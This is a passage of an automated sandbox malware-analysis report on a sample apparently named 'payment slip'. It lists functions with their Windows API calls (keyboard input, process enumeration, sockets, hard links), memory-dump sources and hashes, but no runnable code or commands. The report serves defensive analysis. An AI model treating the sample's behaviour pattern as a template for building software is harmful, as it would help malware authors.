                                        • SetErrorMode.KERNEL32(00000001), ref: 000A4A08
                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 000A4A5C
                                        • SetErrorMode.KERNEL32(00000000,?,?,000CCC08), ref: 000A4AD0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ErrorMode$InformationVolume
                                        • String ID: %lu
                                        • API String ID: 2507767853-685833217
                                        • Opcode ID: 475c3dc51b631d7bdff0734be260a8da3bcf59f6acbeae26af14312950e290c6
                                        • Instruction ID: 57507fe0cacb4307998c63ad4f6938863bfe114f42313bf142506e0b2eab8307
                                        • Opcode Fuzzy Hash: 475c3dc51b631d7bdff0734be260a8da3bcf59f6acbeae26af14312950e290c6
                                        • Instruction Fuzzy Hash: 7E317175A00109AFDB10DF94C885EAEBBF8EF49308F1480A9F909DB252DB75ED45CB61
                                        Function 000C41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 000C424F
                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 000C4264
                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 000C4271
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: msctls_trackbar32
                                        • API String ID: 3850602802-1010561917
                                        • Opcode ID: 7f236933805ca5c63818d579f17229aac67eb5546e16ac10772908994ac3816f
                                        • Instruction ID: d8d699cca7211d41a32070363a306f84b08afe3b72ba0e8eae73ad57ad30cbb4
                                        • Opcode Fuzzy Hash: 7f236933805ca5c63818d579f17229aac67eb5546e16ac10772908994ac3816f
                                        • Instruction Fuzzy Hash: 0911E331240208BEEF215F68CC06FAB3BACFF85B54F014118FA55E6090D271D8519B10
                                        Function 00092F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                          • Part of subcall function 00092DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00092DC5
                                          • Part of subcall function 00092DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00092DD6
                                          • Part of subcall function 00092DA7: GetCurrentThreadId.KERNEL32 ref: 00092DDD
                                          • Part of subcall function 00092DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00092DE4
                                        • GetFocus.USER32 ref: 00092F78
                                          • Part of subcall function 00092DEE: GetParent.USER32(00000000), ref: 00092DF9
                                        • GetClassNameW.USER32(?,?,00000100), ref: 00092FC3
                                        • EnumChildWindows.USER32(?,0009303B), ref: 00092FEB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                        • String ID: %s%d
                                        • API String ID: 1272988791-1110647743
                                        • Opcode ID: 29d7ccab83c22bb2361c8790605768ee7dc15a68e1e6abb28fe670a9ec5572b5
                                        • Instruction ID: 523073459d68a937e0de85b4852e807761efe5cce3e414993ebaf56ad49c1516
                                        • Opcode Fuzzy Hash: 29d7ccab83c22bb2361c8790605768ee7dc15a68e1e6abb28fe670a9ec5572b5
                                        • Instruction Fuzzy Hash: 8F11B171600205ABDF557F70CC99EEE77AAAF84304F048075FA099B293DF319949AF60
                                        Function 000C5882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 000C58C1
                                        • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 000C58EE
                                        • DrawMenuBar.USER32(?), ref: 000C58FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Menu$InfoItem$Draw
                                        • String ID: 0
                                        • API String ID: 3227129158-4108050209
                                        • Opcode ID: c5fc48cfbe12d6d57ac2b4b91296e7144e3a2ab9913275487860dd316f1a1d10
                                        • Instruction ID: be69ffd3be8a444052006dab63c08155f640a38589d7239bf7af95f98792f77c
                                        • Opcode Fuzzy Hash: c5fc48cfbe12d6d57ac2b4b91296e7144e3a2ab9913275487860dd316f1a1d10
                                        • Instruction Fuzzy Hash: C4016D75500218EFEB619F11DC44FAFBBB8FB45362F1080A9E849D6151DB349AC4DF21
                                        Function 000C7803 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetForegroundWindow.USER32(?,001018B0,000CA364,000000FC,?,00000000,00000000,?,?,?,000876CF,?,?,?,?,?), ref: 000C7805
                                        • GetFocus.USER32 ref: 000C780D
                                          • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                          • Part of subcall function 00049944: GetWindowLongW.USER32(?,000000EB), ref: 00049952
                                        • SendMessageW.USER32(00E1E670,000000B0,000001BC,000001C0), ref: 000C787A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$Long$FocusForegroundMessageSend
                                        • String ID: U
                                        • API String ID: 3601265619-2399391058
                                        • Opcode ID: 0fad48d8d49b34b24b780c50680be0cfab661d6dd8b508db3fe4bb872dc7beab
                                        • Instruction ID: cc070df4660c0822a1760de2645c1cd74262520300cd4f74fa1c4985223c8411
                                        • Opcode Fuzzy Hash: 0fad48d8d49b34b24b780c50680be0cfab661d6dd8b508db3fe4bb872dc7beab
                                        • Instruction Fuzzy Hash: 12018F316051009FE329DB28D858FBA33E6EF8A324F18026DE159872E1CB356C46CF81
                                        Function 0009007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fbfa8731ded7a8ca3392ab0e415ac7d10abb87236b7e171d5c46a51868ab7f4c
                                        • Instruction ID: 0d85e05ee286b1fa357207e2934b065315db61cefeb2533adf6f420106fd87f2
                                        • Opcode Fuzzy Hash: fbfa8731ded7a8ca3392ab0e415ac7d10abb87236b7e171d5c46a51868ab7f4c
                                        • Instruction Fuzzy Hash: 38C12C75A00216EFDB14CFA4C894EAEB7B9FF48704F208598E905EB251D731EE41EB90
                                        Function 000B342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInitInitializeUninitialize
                                        • String ID:
                                        • API String ID: 1998397398-0
                                        • Opcode ID: 601043f3babd834bc5147f04c73fbf2e8ca1c41153f242128ad644f86a0d5e19
                                        • Instruction ID: 2a8f2c2791c7c124f814e4117f6a09aa34eb26c5ffeb50fd4a44948f24a7165f
                                        • Opcode Fuzzy Hash: 601043f3babd834bc5147f04c73fbf2e8ca1c41153f242128ad644f86a0d5e19
                                        • Instruction Fuzzy Hash: 12A16B756047009FCB15DF28C485EAAB7E9FF88714F148859F98A9B362DB70EE01CB91
                                        Function 00090436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                        Download Yara Rule
                                        APIs
                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,000CFC08,?), ref: 000905F0
                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,000CFC08,?), ref: 00090608
                                        • CLSIDFromProgID.OLE32(?,?,00000000,000CCC40,000000FF,?,00000000,00000800,00000000,?,000CFC08,?), ref: 0009062D
                                        • _memcmp.LIBVCRUNTIME ref: 0009064E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: FromProg$FreeTask_memcmp
                                        • String ID:
                                        • API String ID: 314563124-0
                                        • Opcode ID: f7ba5d67824fc699400f58f5ad11c23c5c19d667c737bd098620ed78c0a1d287
                                        • Instruction ID: 2d31c36415d8ce80d66d2b699a607ebf44a1fee05075cac0e18ac6178039e8d6
                                        • Opcode Fuzzy Hash: f7ba5d67824fc699400f58f5ad11c23c5c19d667c737bd098620ed78c0a1d287
                                        • Instruction Fuzzy Hash: 6281F671A00109EFCF04DF94C988EEEB7B9FF89315F204598E516AB250DB71AE06DB60
                                        Function 00071391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: 383bb29c883ced643d7462ac278eb4f73ef0357fbffa8fc016c27940bf02bf8c
                                        • Instruction ID: ccc4f12569830c1e2373e1118de8637cdcf02bd5cf356ba5651a44c485707e82
                                        • Opcode Fuzzy Hash: 383bb29c883ced643d7462ac278eb4f73ef0357fbffa8fc016c27940bf02bf8c
                                        • Instruction Fuzzy Hash: CA414871E00501ABDB356BBC8C46AFE3AE5EF41370F248225F81DD32D3EA3C89415266
                                        Function 000B1AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 000B1AFD
                                        • WSAGetLastError.WSOCK32 ref: 000B1B0B
                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 000B1B8A
                                        • WSAGetLastError.WSOCK32 ref: 000B1B94
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ErrorLast$socket
                                        • String ID:
                                        • API String ID: 1881357543-0
                                        • Opcode ID: 240546d734cd3f75508afdc71f2e04d158f5b180d7e9cc6296c17d9946074e7f
                                        • Instruction ID: 9ca24553d255b019ba9f5cb59a98beb737b2e6ae54404a02a665defd4d0b7956
                                        • Opcode Fuzzy Hash: 240546d734cd3f75508afdc71f2e04d158f5b180d7e9cc6296c17d9946074e7f
                                        • Instruction Fuzzy Hash: 4341B1746002006FE720AF24C886FAA77E5EB44718F948458FA1A9F3D3D772DD418B90
                                        Function 0006B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7bea6a918cfcca3bfed806a33a993de92fe72bf0bafb5040aa2562c926fb6cd6
                                        • Instruction ID: f84582c5a524341afeb7efa5a6551d9c75ebc2360e0ecbf56e022dd05fe19161
                                        • Opcode Fuzzy Hash: 7bea6a918cfcca3bfed806a33a993de92fe72bf0bafb5040aa2562c926fb6cd6
                                        • Instruction Fuzzy Hash: 074119B1A00714BFD724AF38CC41BEABBEAEF84710F10852AF556DB2D2D77599418790
                                        Function 000A56D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 000A5783
                                        • GetLastError.KERNEL32(?,00000000), ref: 000A57A9
                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 000A57CE
                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 000A57FA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                        • String ID:
                                        • API String ID: 3321077145-0
                                        • Opcode ID: 11ff9685375bbcc58648b2a2a1d8bc87bbfbfaa8a464170bfb97f625748ce81f
                                        • Instruction ID: 4f0ac46ae9fbf4ffc90e43080fd5970aabd977cc971a3731da5a5fe88a8ae643
                                        • Opcode Fuzzy Hash: 11ff9685375bbcc58648b2a2a1d8bc87bbfbfaa8a464170bfb97f625748ce81f
                                        • Instruction Fuzzy Hash: 07413E39600A10DFDB25DF55C444A5DBBE5FF49321F188488E84AAB362CB74FD01CB91
                                        Function 0006D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00056D71,00000000,00000000,000582D9,?,000582D9,?,00000001,00056D71,8BE85006,00000001,000582D9,000582D9), ref: 0006D910
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0006D999
                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0006D9AB
                                        • __freea.LIBCMT ref: 0006D9B4
                                          • Part of subcall function 00063820: RtlAllocateHeap.NTDLL(00000000,?,00101444,?,0004FDF5,?,?,0003A976,00000010,00101440,000313FC,?,000313C6,?,00031129), ref: 00063852
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                        • String ID:
                                        • API String ID: 2652629310-0
                                        • Opcode ID: 20b6e46a375e418717ab47178804057c03b636f841cfb45c7a75ceedcb7fc7a2
                                        • Instruction ID: 9bff75bbb65425934817ff584f8020d5da37f28b04ecf4eb17eb4ac2e3a08b6f
                                        • Opcode Fuzzy Hash: 20b6e46a375e418717ab47178804057c03b636f841cfb45c7a75ceedcb7fc7a2
                                        • Instruction Fuzzy Hash: 0031AD72A0020AABEF259F65DC45EEF7BA6EB41310B05416AFC08D7291EB35CD54CBA0
                                        Function 0009AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 0009ABF1
                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 0009AC0D
                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 0009AC74
                                        • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 0009ACC6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: KeyboardState$InputMessagePostSend
                                        • String ID:
                                        • API String ID: 432972143-0
                                        • Opcode ID: 2f193df8491f5a4c238148f864e434510fce631da61cfc06de156d7250baf388
                                        • Instruction ID: 2c3ec746e1f28ab5756165947c12a4314cf1ba7882c4f6a084e9368e193ec3d2
                                        • Opcode Fuzzy Hash: 2f193df8491f5a4c238148f864e434510fce631da61cfc06de156d7250baf388
                                        • Instruction Fuzzy Hash: 6A3106B0B046186FFF35CB65CC04BFE7BE5AB8A321F04461AE4859A1D1C3798985A7D2
                                        Function 000C16DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetForegroundWindow.USER32 ref: 000C16EB
                                          • Part of subcall function 00093A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00093A57
                                          • Part of subcall function 00093A3D: GetCurrentThreadId.KERNEL32 ref: 00093A5E
                                          • Part of subcall function 00093A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,000925B3), ref: 00093A65
                                        • GetCaretPos.USER32(?), ref: 000C16FF
                                        • ClientToScreen.USER32(00000000,?), ref: 000C174C
                                        • GetForegroundWindow.USER32 ref: 000C1752
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                        • String ID:
                                        • API String ID: 2759813231-0
                                        • Opcode ID: 45978b0a0f60b25fd3efcfe7a2bbe72a10113a11e4e6a8d139c6a3545d52fd8a
                                        • Instruction ID: bc3ab090f351f151e8d7821f02604cd360b918b05cb1d28ee6586bdd5cc126f6
                                        • Opcode Fuzzy Hash: 45978b0a0f60b25fd3efcfe7a2bbe72a10113a11e4e6a8d139c6a3545d52fd8a
                                        • Instruction Fuzzy Hash: 22315E75D04249AFDB04EFA9C881DEEBBFDEF49304B5080A9E419E7212D6319E45CFA0
                                        Function 0009D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0009D501
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0009D50F
                                        • Process32NextW.KERNEL32(00000000,?), ref: 0009D52F
                                        • CloseHandle.KERNEL32(00000000), ref: 0009D5DC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 420147892-0
                                        • Opcode ID: 51951799635ff8697bc8517e48d801fcd5b04a4b2bb474bd19cd99273c43abe9
                                        • Instruction ID: d0d3072cf855d5879fce946656e465ba494c6f3fa5ec470c84509812d43f047b
                                        • Opcode Fuzzy Hash: 51951799635ff8697bc8517e48d801fcd5b04a4b2bb474bd19cd99273c43abe9
                                        • Instruction Fuzzy Hash: 2731A4711083009FD701EF54C881EAFBBF8EFD9354F54092DF585861A2EB719945CB92
                                        Function 0009D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesW.KERNEL32(?,000CCB68), ref: 0009D2FB
                                        • GetLastError.KERNEL32 ref: 0009D30A
                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0009D319
                                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,000CCB68), ref: 0009D376
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
